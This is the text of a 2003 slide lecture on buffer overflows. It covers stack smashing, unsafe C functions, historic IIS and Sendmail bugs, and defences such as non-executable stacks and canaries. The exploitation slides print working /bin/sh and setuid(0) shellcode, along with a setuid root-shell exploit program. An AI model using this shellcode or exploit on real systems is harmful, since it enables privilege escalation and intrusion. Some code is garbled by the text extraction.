Buffer Overflows
Buffer Overflows
Buffer Overflows
A presentation by Jonathan Levin
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
Modern Day Hacking must shift its trend, and face new challenges. First and foremost of these challenges is the Firewall. Hackers can no longer simply telnet to any UNIX, or net use any NT/2K, as firewalls will disable all but the most necessary services. This forces todays hacker to attack those services, which are imperative, and cannot be filtered. These are the public services, to which access is allowed, by definition, from any host. And they are: WWW The World-Wide Web service FTP The File Transfer Protocol SMTP Email DNS Domain Name Service
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
Many attacks exist vs. these services, the main classes of which I have listed above. The first four are primarily targeted at HTTP-based services and CGI programs. They all involve malformed input, which the firewall cannot protect against. Buffer Overflows and format string attacks are directed against all classes of services.
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
Introducing BOs
Buffer Overflows
public enemy #1
None of the attacks, however, is as deadly and as fearsome as Buffer Overflows. BOs are hands-down the most severe threat against modern networks. Resulting from a conceptual flaw in the C programming language, Many programs susceptible, due to lack of good coding standards
It is important, at this point, to emphasize that Buffer Overflows are not the result of a programming bug, so much as they are a fundamental, conceptual flaw in the C/C++ operating languages. These languages, developed in the early 70s and 80s, respectively, had the notion of a responsible programmer, and sacrificed structural programming for the sake of efficiency.
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
Introducing BOs
Buffer Overflows
Reasons for BOs BO
Most applications are written in C, or C++. Both languages: - Manipulate memory by using pointers - Perform no bounds checking on buffers. BOs Enable overwriting entire regions of memory with arbitrary data. And, due to the Von-Neumann architecture executing arbitrary code.
The strongest features of these languages are, surprisingly, their Achilles Heel. By giving the programmer the full capabilities of memory allocation and referencing, many powerful abilities are gained. However, incorrect usage or programmatic errors are far more abundant. These languages are highly error prone. John Von-Neumann stated the basic computer architecture back in the 50s. His model, called the Von-Neumann Machine, enables a duplicity between program code and data. Code is data, and vice versa. This architecture is what makes buffer overflows ever more fearsome. Programs can be tricked to treat external input as data, thus leading to the execution of arbitrary commands.
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
Buffer Overflows
what are they?
This slides illustrates the most basic case of a buffer overflow, which is a very benign one. Automatic variables (i and c) are allocated on the stack, in reverse order. Assuming a stack which grows downwards, copying ABCDEF into a buffer that can only hold ABCD will force the EF into the next available memory area, held by i. This overflow usually leads to logic bugs, if the value of i is later tested. While this is not as serious as the code injection technique which will be shortly described, it is not to be underestimated, either. A bug in all versions of Solaris TelnetD enables hackers to bypass authentication by overflowing an internal variable holding the authentication state..
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
The Vulnerability
Buffer Overflows
Smashing the stack for fun and profit..
So long as buffer overflows occur accidentally, they pose no real problem program abends on a segmentation fault. However, when carefully directed to overrun the return address of a function on the stack, arbitrary code may be injected. Elias Levy of BUGTRAQ has written an excellent article (Phrack 49 http://www.phrack.org) http://www.phrack.org
In his article, Smashing the Stack for Fun and Profit, in Phrack #49, Elias Levy explains how buffer overflows may be directed and manipulated to execute arbitrary code. This article became a landmark in contemporary hacking, as it was the first to explain the usefulness of BOs, which were a closely guarded secret in the hacker community, to the novice hackers.
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
The Vulnerability
Buffer Overflows
Smashing the stack for fun and profit..
Mem
User Input Input obtained from the user is copied onto a temporary storage, called the stack. The same storage also stores the location in memory to return, at the end of the program or function.
Input Buffer..
Return Address
Process Stack
Elias Levy, (also known as Aleph One), introduces the term: `smash the stack` [C programming] n. On many C implementations it is possible to corrupt the execution stack by writing past the end of an array declared auto in a routine. Code that does this is said to smash the stack, and can cause return from the routine to jump to a random address. This can produce some of the most insidious data-dependent bugs known to mankind. The same data structure that holds the automatic variables, (the user stack), also holds the return address of the currently executing procedure. By overwriting the variables, it is possible to cause the CPU to jump to any arbitrary memory location of our choice.
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
The Vulnerability
Buffer Overflows
Smashing the stack for fun and profit..
Mem
Return Address
Process Stack
If the user input is too large, it can overflow its buffer on the stack, and destroy other regions in it..
If the return address is corrupted accidentally or incorrectly, program abend will occur. In UNIX, this is usually the Segmentation Fault (SIGSEGV) or Illegal Instruction (SIGILL) which occur. The former, when the Return Address points to a protected memory region, and the latter, when it points to a location that does not contain a valid machine op code. In windows, when you get the Illegal Instruction MessageBox its an arbitrary buffer overrun, since The buffer gets corrupted by random data, which is most often not even valid assembler instructions. As such is the case, an exception occurs, which is intercepted by the operating system, terminating the program.
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
The Vulnerability
Buffer Overflows
Smashing the stack for fun and profit..
Mem
Dummy Opcodes Shell Code Input Buffer.. Address of shellcode If the input is carefully crafted, attacker can supply arbitrary code, and direct the return address right to it.
Return Address
Process Stack
Aleph One demonstrates how an attacker may place machine code in usersupplied input, while at the same time overflowing that buffer, so that the return address will be overwritten, and point back into the buffer itself. In cases where it is hard or impossible to determine the exact address of the buffer, it may be simply padded with NOP op codes (0x90 for i386). Note, that due to the virtual memory model, once the addresses are correctly determined (with the aid of a trusty debugger), they may almost always be treated as constant values.
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
10
The Vulnerability
Buffer Overflows
Smashing the stack for fun and profit..
Mem
If the return address is carefully overwritten, at the end of the function/program the attacker supplied code will be executed. This isnt all that trivial to achieve, but once achieved gets em every time
Process Stack
When done right, this forces a trampoline effect back into that code. This is where the Von-Neumann architecture is exploited: The buffer is again evaluated by the CPU, this time containing legal machine op codes, and is silently executed. This is another horrid side effect of buffer overflows if carried out correctly, they hijack the current execution path of the program, and so do not even get logged!
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
11
Example
Buffer Overflows
Stack Overflow Example: int main(int argc, char **argv) argc, **argv) { if (argc != 2) (argc { printf ("Usage: %s input\n", input\ argv[0]); exit(1); } myFunc(argv[1]); return 0; }
include <stdio.h> <stdio.h> #include <string.h> <string.h> #define BUFSIZE 4 void myFunc(char *someBuf) someBuf) { char buf[BUFSIZE]; buf[BUFSIZE]; printf ("Copying ..."); /* Let's do a REALLY stupid thing here */ strcpy(buf,someBuf); /* NO Bounds check! */ strcpy(buf,someBuf); printf ("Returning...\n"); ("Returning...\ }
The example above shows how overflows are performed, in practice. An unsafe C standard library function (in this case, strcpy(), which knows no bounds), copies a buffer, and exceeds the allocated space.
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
12
Example
Buffer Overflows
Stack Overflow Example:
Note that the value 38373635 is ASCII 8765! Remember, intel machines are little-endian hence the reversal. Meaning, the return address was located exactly 4 bytes following our buffer. Examining the disassembly file makes it all the more clearer Our buffer was at [ebp-4]. The old value of ebp lay at ebp (which we wrote with 34333231. Before that was the return address.
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
13
Example
Buffer Overflows
Example:
*someBuf (argv[1]) 5 6 7 8 1 2 3 4 a b c d
The Strcpy() function keeps on copying past the allocated buffer size, until it reaches a \0. This overwrites the stack frame pointer, return address, etc. If the return address is corrupted randomly, a segmentation fault occurs
Since the address contains 5678 (or 8765, but you get the point), this is the address to which the program will jump when the function completes. If you can set that address to any arbitrary one in memory youve won. The example shown executes another function, already in memory. In practice, hackers use this idea not to execute other regions of code in a program, but rather to load their own. This is commonly known as code injection .
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
14
Buffer Overflows
Buffer Overflows
vulnerable functions
Buffers are overwritten as a result of unchecked string and memory copy operations:
strcpy copies till it drops (till a \0 is found) Ditto for strcat, which concatentates till a \0.. gets inputs a string till a \n is encountered Even *printf(!) functions are susceptible! NO BOUNDS checking exists!
*Sigh* If only programmers wrote solid code, thered be no hacks! char *strcpy(char *dest, const char *src); char *strcat(char *dest, const char *src); char *gets( char *buffer ); /* Note no mention of buffer size here.. */ int sprintf( char *buffer, const char *format [, argument] ... ); /* is sizeof(buffer) < expanded format ? */
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
15
Exploiting BOs BO
Buffer Overflows
Exploiting BOs
Hence, our modus operandi is simple: Create an injected code buffer, by compiling:
execve(name[0], "/bin/sh", NULL)
char egg[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46 \x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89" " \xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
(The example above being UNIX shellcode, but you get the idea) shellcode,
The Last Stage of Delerium (http://www.lsd-pl.net) has released a comprehensive PDF of assembly codes for various useful tasks, such as spawning a shell, binding a socket, and other useful stuff to do (for hackers). These Polish security experts/hackers go an extra step, and make sure that their shell code does not contain illegal characters, such as NUL (\0) or \r,\n, which cause strcpy() or gets(), respectively, to quit. Remember that the exact address of the egg code need not be precise, if the code is padded with NOPs.
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
16
Exploiting BOs BO
Buffer Overflows
That vulnerability is purely theoretical theoretical
#include <stdio.h> <stdio.h> void main (int argc, char **argv) (int argc, **argv) { int i = 0; int j = 1; char c[30]; printf("address of i is: %p\n", &i); %p printf("address of j is: %p\n", &j); %p printf("address of c is: %p\n", c); %p if (argc != 2) (argc { printf("Need arg\n"); arg\ exit(1); }
To make it easier, this program prints out the stack addresses. This is solely for demonstration purposes. At worst, use a debugger...
The following example demonstrates the full capabilities of code injection. Note the above program, which is rather innocuous. The addresses of the automatic variables were printed out, for ease of demonstration. Remember that these addresses can be determined easily with a debugger, anyhow. The vulnerable line of code is in the strcpy() function. Just for the heck of it, this program will be compiled and set UID, meaning it will have root privileges. Most of the UNIX exploited programs are setUIDs, such as passwd(), eject(), various X programs, and so forth.
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
17
Exploiting BOs BO
Buffer Overflows
That vulnerability is purely theoretical theoretical
extern char shellcode[]; /* Code for system(/bin/sh); */ shellcode[]; system( /bin/sh extern char setuidcode[]; /* Code for setuid(0); */ setuidcode[]; void main (int argc, char **argv) (int argc, **argv) { char buffer[64]; /* buffer to supply vulnerable program */ int i,j ; /* temporary variables */
Exhibit A: Exploit
/* * Step I: Load the SetUID code into the buffer. * This is required because otherwise shell will be spawned * with our UID. */
i = sizeof(setuidcode); sizeof(setuidcode); printf("Loading %d bytes of setuid() onto buffer\n", i); setuid() buffer\ strcpy(buffer,setuidcode); strcpy(buffer,setuidcode);
/* * Remove the NUL following the shellcode... shellcode... * That NUL is at (i-1) + (j-1) = i+j-2 (i(ji+j* (since sizeof() accounts for the NUL in each string, as well) sizeof() */ /* * Make this interactive, just for the fun of it */ /* Load the address: 0xbffffe90 */ /* This is done in reverse order (little endian machine) */
buffer[i++]=0x90; buffer[i++]=0x90; buffer[i++]=0xfe; buffer[i++]=0xfe; buffer[i++]=0xff; buffer[i++]=0xff; buffer[i++]=0xbf; buffer[i++]=0xbf; printf("Where is the return address located?"); scanf("%d",&i); scanf("%d",&i); buffer[i+j-2]='X'; buffer[i+j-
/* * Strcpy places a terminating NUL, but since we'll concat the * shellcode immediately afterwards, we don't really care... */
j = sizeof(shellcode); sizeof(shellcode); printf("Loading %d bytes of shellcode onto buffer\n", j); buffer\ strcat(buffer,shellcode); strcat(buffer,shellcode);
/* And.. */
}
execle("./bo","bo",buffer,0,0);
Our exploit will smash the stack by injecting two segments of foreign code into the program. The buffer which we will supply is intentionally FAR larger than the one allocated by the program (64 or so, instead of 30).
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
18
Exploiting BOs BO
Buffer Overflows
That vulnerability is purely theoretical theoretical
Exhibit B: Shellcode
char shellcode[]= shellcode[]= "\x31\xc0" x31\ "\x50" "\x68""//sh" "\x68""/bin" "\x89\xe3" x89\ "\x50" "\x53" "\x89\xe1" x89\ "\x99" "\xb0\x0b" xb0\ "\xcd\x80" xcd\ ; /* From LSD-PL.Net */ LSDchar setuidcode[]= setuidcode[]= "\x33\xc0" x33\ "\x31\xdb" x31\ "\xb0\x17" xb0\ "\xcd\x80" xcd\ ;
/* /* /* /* /* /* /* /* /* /* /* /*
24 bytes xorl %eax,%eax pushl %eax pushl $0x68732f2f pushl $0x6e69622f movl %esp,%ebx pushl %eax pushl %ebx movl %esp,%ecx cdql movb $0x0b,%al int $0x80
*/ */ */ */ */ */ */ */ */ */ */ */
/* /* /* /* /*
*/ */ */ */ */
This was taken off - http://www.lsd-pl.net. Note that hackers need not reinvent the wheel...
The shellcode itself, we reuse, from the excellent LSD article (http://www.lsdpl.net). After all, why do extra work? Setuidcode[] is the assembled instructions for the C function setuid(0); Shellcode[] contains the assembled instructions for the C function system(/bin/sh); If a setuid root program can be tricked into spawning a shell, that shell will ALSO be setuid root with disastrous (or fantastic, depending on your point of view) consequences. This is known as a root shell (http://www.rootshell.com used to be a public hacker websites with many exploits).
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
19
Buffer Overflows
Traditionally, BOs were thought to be a UNIX plague enabling SetUID hacks. Recently, however, numerous overflows has been found in Microsoft code, especially IIS 4/5. Additional BOs were found in outlook and even wordpad, enabling execution of code embedded in emails and documents by merely previewing them!
Buffer overflows are NOT confined to the UNIX environments. While they originated there, it was solely due to the fact that UNIX used to be the undisputed leading OS. Now that Windows has undermined UNIXs rule, it, too, faces ongoing attempts by hackers to exploit and hack. And, in fact, since Windows NT 4.0 was first introduced, the number of security faults in it has surpassed that of UNIX in its 30 or so years. Buffer overflows are EVERYWHERE. The most notorious ones are in desktop client apps, such as outlook and explorer. When these are exploited, (in a rogue email, or malicious web site), your client is automatically infected.
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
20
Buffer Overflows
..some people never learn.. learn..
When presented with the first IIS 4 overflow (.htr), Microsoft replied: That bug is purely theoretical. The bug was so theoretical, eEye (http://www.eeye.com) released a fully working exploit The bug remained theoretical in IIS 5, with the .ida buffer overflow. Windows XP has another theoretical bug, in its UPNP (port 5000) service.
Microsoft found the concept of Buffer Overflows highly entertaining.. At first. When presented with the first (now legendary) overflow, in the IIS 4 ISAPI filter for .htr requests, they dismissed it as purely theoretical. That quote still hangs as a banner in many hacker sites today. It was only after security experts in eEye released a fully working exploit, with a sophisticated shellcode, that Microsoft finally acknowledged the flaw. eEye managed to present a shellcode that binds IIS to a client port, downloads an executable from a hacker supplied location, AND executes it. Microsoft may have fixed the .htr bug, but others surfaced: IIS 5 brought the .printer overflow, the Indexing Service (.ida) overflow basis for code red wormz, and more. Even windows XP has a remotely exploitable BO in a rather esoteric service called uPnP. And if thats not enough, the .htr bug reappeared in the patched IIS..
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
21
Exploits
Finding vulnerable sites couldnt be easier, with services happily couldn advertising their version numbers..
The main point about buffer overflows is, once a hacker painstakingly builds an exploit, that exploit can be re-used indefinitely by others. Exploits usually circulate in the hacker circles for weeks, sometimes even months, before becoming widespread. A fine example for that was the famous WU-FTPd 2.6.0 heap overflow exploit, which was known to hackers for over 6 months before the security companies were even aware something was amiss with this ubiquitous FTP server.
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
22
Vulnerable Apps
Buffer Overflows
A partial list list
Date June 16, 1999 Feb 2, 2000 Nov 3, 2000 Nov 16, 2000 May 01, 2001 June 12,2001 April 10, 2002 June 12, 2002 Oct 19, 2002 March 3, 2003 System IIS 4 WU-FTPD WUIIS 4 IIS 4,5 IIS 5 IIS 4,5 IIS 4, 5 IIS 4,5 SQL Server Sendmail Description .htr buffer overflow Heap Overflow .asp buffer overflow Unicode Directotry traversal .printer overflow (SYSTEM level access) .ida (SYSTEM level access) Chunk Encoding .asp ANOTHER .htr vulnerability Misc. Overflows CRITICAL(!) BO in crackaddr.c
The following two slides show but a few of the buffer overflows. The last of them (SendMail) was added mere days before the presentation was submitted, and affects ALL versions of the SendMail software, which accounts for over 75%(!) of the worlds MTAs!
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
23
Vulnerable Apps
IE 66Flash
Client side vulnerabilities pose an equal, if not greater risk Firewalls may filter incoming connections, but they certainly do not do so for outgoing requests such as Instant Messaging, Web Browsing, and so. Imagine watching a cool flash movie.. But at the same time installing a trojan horse on your computer..
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
24
CounterMeasures
Stack Overflows
Possible Solutions
Certain OSes enable a kernel parameter to set the stack to a non-executable mode, so a jmp instruction to its region would cause a segmentation fault.
Solaris was the pioneer OS to offer stack protection (probably due to the numerous exploits in 2.5 and 2.51 setuids()). All 64-bit version stacks are non-executable, by default. Attempts to execute regions on the stack are logged. HP-UX 11.x picked up this approach, as did Linux.
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
25
CounterMeasures
Stack Overflows
Possible Solutions
Approach #2: Use a canary value on stack, to guard against corruption (e.g. StackGuard, VS7). VS7s /GS option buffer security check checks.
New to Visual Studio 7, this option inserts a random canary value value into the stack while in the function prolog, which the function epilog then checks, upon return. If the values mismatch, the program terminates with an error. (Easily Defeated with heap overflows and SEH smashing) smashing
The term canary was coined following the practice of using canaries in coal mines. The idea is a fairly simple, if not nave one: The function epilog sets a random value on the stack, adjacent to the return address. Any stack overflow attack will have to overwrite the canary on the way to the return address. Such an overwrite will have to kill the canary and be detected by the function epilog. Note that this does NOT protect against attacks which can somehow target the return address without corrupting other data, overriding of static function pointers, or heap based overflow attacks. Windows 2003 further attempts DEP (Data Execution Prevention) by a non executable stack but this, too, has been countered.
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
26
Heap Overflows
Heap-based overflows operate in the heap regions. Though based on the same principle, they are harder to exploit, and FAR harder to protect against. Classified into bss or generic heap overflows, they emanate from the same reasons as stack overflows, but target malloc()/free() block structs. Since they directly overwrite the return addresses without smearing data buffers, canary values are useless against them.
Heap Overflows are far beyond the scope here, but are virtually impossible to protect against. They stem from the same problem improper use of strcpy() and other such functions, but involve corrupting the heap memory and malloc() blocks, so that, upon allocation (or when free()ing), totally different regions of memory will be overwritten.
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
27
%n one of the undocumented features of printf outputs the formatted number of bytes so far to an OUTPUT variable (and, if one doesnt exist to the top of the stack). By carefully employing ridiculous format strings such as %100000000s%n, it is possible to write any arbitrary 32-bit value into any location in memory. Nuff Said. And all this.. Because programmers are lazy , and wont write: printf (%s, buffer);
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
28
Final Words
Newer languages, such as Java/C# no longer permit pointers and programmer memory management. These languages run in contained environments (JVM, CLR), which prevent stack corruption. Now that programmers are aware, more source code is being annotated and checked.
Java and C# are both impervious to Buffer Overflows. Both are also in managed environments, which protect against stack corruption, and will not accept arbitrary code as input. But then, numerous OTHER vulnerabilities exist in Java VMs. And as for .Net can anyone safely claim Microsoft got security right on the first try? But Thats for another presentation.
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
29
Online Bibliography
Phrack #49 Aleph1 on Buffer Overflows www.phrack.org W00w00 Heap Overflow Tutorial www.w00w00.org/files/articles/heaptut.txt Last Stage of Delerium : http://www.lsd-pl.net Packet Storm: http://www.PacketStormSecurity.com
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
30
Offline Bibliography
Writing Secure Code:
By Michael Howard & David LeBlanc, MS Press, 2002.
(C) 2003 - [email protected] - Free for non commecial use, but please drop me a line first!
31